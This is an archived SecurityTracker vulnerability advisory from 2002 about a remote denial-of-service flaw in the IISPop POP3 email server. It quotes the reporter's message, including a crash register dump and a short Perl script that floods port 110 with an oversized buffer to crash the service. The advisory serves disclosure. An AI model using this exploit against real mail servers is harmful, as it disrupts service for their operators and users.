SecurityTracker.com Archives - IISPop EMail Server Can Be Crashed By Remote Users

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (E-mail Server) > IISPop EMail Server

Vendors: Curtis Specialty Computing

IISPop EMail Server Can Be Crashed By Remote Users

SecurityTracker Alert ID: 1005627

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Nov 14 2002

Impact: Denial of service via network

Exploit Included: Yes

Version(s): Tested on versions 1.161 and 1.181

Description: A denial of service vulnerability was reported in the IISPop EMail Server. A remote user can cause the server to crash. Securma Massine reported this flaw.

A remote user can send a long string (289999 byte) to the POP3 mail server to cause the mail server to crash.

A demonstration exploit script is provided in the Source Message.

Impact: A remote user can cause the POP3 mail service to crash.

Solution: No solution was available at the time of this entry.

Vendor URL: www.curtiscomp.com/ (Links to External Site)

Cause: Boundary error

Underlying OS: Windows (2000)

Reported By: securma massine <securma@caramail.com>

Message History: None.

Source Message Contents

Date: Thu, 14 Nov 2002 12:15:05 GMT+1
From: securma massine <securma@caramail.com>
Subject: IISPop remote DOS vulnerability

 


hi

The IISPop EMail Server (http://www.curtiscomp.com/)was 
designed for small networks,This is a POP3 only server, 
designed to be paired with the SMTP server bundled in 
Windows 2000/IIS 5.
 
 I have found that IISpop is vulnerable has a attack DOS 
caused by sends of a broad buffer (289999 byte) this attack 
gives the following state of the registers (tested on v 
1.161 end 1.181)

Access violation - code c0000005 (first chance)
eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae 
esi=0040693d edi=00437181
eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0 nv up 
ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 
gs=0000 efl=00000206
KERNEL32!GetCurrentThreadId+4:
77e76941 0000 add [eax],al 
ds:0023:00000041=??

(unhandled exeption in IISPop.exe (KRNELL32.DLL) 
0xc0000005 : access violation

exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl 
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
# 
 
use IO::Socket;

$ARGC=@ARGV;
if ($ARGC !=1) {
	print "\n-->";
 print "\tUsage: perl iispdos.pl <host> \n";
	exit;
 

$remo = $ARGV[0]; 
$buffer = "A" x 289999; 

print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
					 PeerAddr => $remo,
					 PeerPort 
=> "110"))
 
 print "-->";
 print "\tConnection Failed...\n";
 exit;
 
print $so "$buffer\n";
close $so;

print "-->";
print "\tnow test if the distant host is down\n";
exit;


_________________________________________________________ 
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2002, SecurityGlobal.net LLC